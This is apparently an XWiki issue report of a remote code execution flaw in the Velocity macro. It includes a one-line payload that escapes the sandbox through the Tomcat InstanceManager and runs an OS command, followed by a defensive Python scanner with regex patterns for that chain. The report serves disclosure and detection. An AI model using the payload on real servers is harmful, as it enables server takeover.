XWiki Platform / XWIKI-23702

Remote Code Execution via Velocity scripts (Macro)


    Description

      A Remote Code Execution (RCE) vulnerability exists in the Velocity macro and can be exploited by an authenticated user with script permissions.
      The application allows users to create Velocity scripts; consequently, an attacker can inject arbitrary Velocity expressions or other malicious template syntax that are evaluated server-side, bypassing the Velocity sandbox.
      By crafting a specially designed payload, the attacker can execute arbitrary commands on the underlying operating system with the privileges of the web application.

      Payload:

      $request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')")
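      As an added example, not code from the issue or from the XWiki project: a defender-side audit check that scans wiki page source for the container-access chain quoted above, so an administrator can find existing Velocity content that reaches through `$request.request` into the servlet container. It assumes XWiki 2.x `{{velocity}}` macro syntax; the indicator list and the sample page are constructed for the example.

```python
import re
from typing import Dict, List

# Heuristic indicators for Velocity code that reaches out of the script
# sandbox through the servlet request into the container, as in the access
# chain quoted in the issue description. Constructed for this example; not
# an XWiki API and not an official rule set.
INDICATORS = [
    ("servlet-context-access",
     re.compile(r"\$request\.request\.getServletContext\s*\(")),
    ("tomcat-instance-manager",
     re.compile(r"org\.apache\.tomcat\.InstanceManager")),
    ("reflective-instantiation",
     re.compile(r"\.newInstance\s*\(\s*[\"']")),
    ("jpython-interpreter",
     re.compile(r"org\.apache\.batik\.script\.jpython\.JPythonInterpreter")),
]

# {{velocity}} ... {{/velocity}} macro bodies in XWiki 2.x syntax.
VELOCITY_MACRO = re.compile(r"\{\{velocity[^}]*\}\}(.*?)\{\{/velocity\}\}", re.S | re.I)

def extract_velocity_blocks(wiki_source: str) -> List[str]:
    """Return the body of every Velocity macro found in the page source."""
    return VELOCITY_MACRO.findall(wiki_source)

def scan_velocity(wiki_source: str) -> Dict[int, List[str]]:
    """Map the index of each Velocity block to the indicator names it matches.

    Blocks with no hits are omitted, so an empty dict means nothing suspicious.
    """
    findings: Dict[int, List[str]] = {}
    for idx, body in enumerate(extract_velocity_blocks(wiki_source)):
        hits = [name for name, rx in INDICATORS if rx.search(body)]
        if hits:
            findings[idx] = hits
    return findings

# Constructed sample page source: one ordinary block and one that uses the
# container access chain from the issue (the command string is omitted).
SAMPLE_PAGE = """
{{velocity}}
#set($name = $xcontext.user)
Hello $name
{{/velocity}}

Some wiki text.

{{velocity}}
#set($im = $request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager"))
$im.newInstance("org.apache.batik.script.jpython.JPythonInterpreter")
{{/velocity}}
"""

if __name__ == "__main__":
    for idx, hits in scan_velocity(SAMPLE_PAGE).items():
        print(f"velocity block {idx}: {', '.join(hits)}")
```

      Run it over exported page XAR content or a database dump of document source; a hit is a page to review, not proof of exploitation, since the check is pattern-based.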

      People

              surli Simon Urli
              isfake Youssef Azefzaf